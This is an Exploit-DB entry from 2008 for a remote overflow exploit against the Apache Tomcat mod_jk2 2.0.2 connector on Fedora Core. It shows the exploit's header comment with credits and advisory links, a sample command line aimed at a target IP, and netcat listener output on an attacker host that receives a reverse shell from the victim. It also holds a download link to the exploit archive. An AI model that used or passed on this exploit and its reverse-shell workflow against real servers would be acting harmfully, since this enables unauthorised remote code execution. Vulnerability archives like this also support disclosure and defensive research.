Apache Tomcat Connector jk2-2.0.2 mod_jk2 - Remote Overflow

EDB-ID:

5386




Platform:

Linux

Date:

2008-04-06


/*
**
** Fedora Core 6,7,8 (exec-shield) based
** Apache Tomcat Connector jk2-2.0.2(mod_jk2) remote overflow exploit
** by INetCop Security
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://www.milw0rm.com/papers/151
**
** IOActive Security Advisory:
** http://www.securityfocus.com/archive/1/487983
**
** Heretic2(heretic2x@gmail.com)'s exploit (Win32):
** http://www.milw0rm.com/exploits/5330
**
** --
** exploit by INetCop Security.
*/
/*
** --
** $ ./0x82-apache-mod_jk2 61.xx.xx.20 80 61.xx.xx.30
**
**  Fedora Core release 6 (exec-shield) based
**  Apache Tomcat Connector (mod_jk2) remote overflow exploit
**  Target Version: Apache/2.0.53 (Unix) mod_jk2/2.0.2
**  by INetCop Security
**
**  + make socket
**  + make exploit payload
**  + try connected 61.42.25.22:80
**  + exploit send!
**  * attacker host, check it up, now! :-D
**
** $
** --
**
** attacker's server port 56789: -- 
** $ nc -l -p 56789 -vv
** listening on [any] 56789 ...
** 61.xx.xx.20: inverse host lookup failed: Unknown host
** connect to [61.xx.xx.30] from (UNKNOWN) [61.xx.xx.20] 47576
** id
** --
**
** attacker's server port 5678: --
** $ nc -l -p 5678 -vv
** listening on [any] 5678 ...
** 61.xx.xx.20: inverse host lookup failed: Unknown host
** connect to [61.xx.xx.30] from (UNKNOWN) [61.xx.xx.20] 52452
** uid=99(nobody) gid=4294967295 groups=4294967295 context=root:system_r:unconfined_t:s0-s0:c0.c1023
** --
**
*/

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5386.tar.gz (2008-x2_fc6f7f8.tar.gz)

# milw0rm.com [2008-04-06]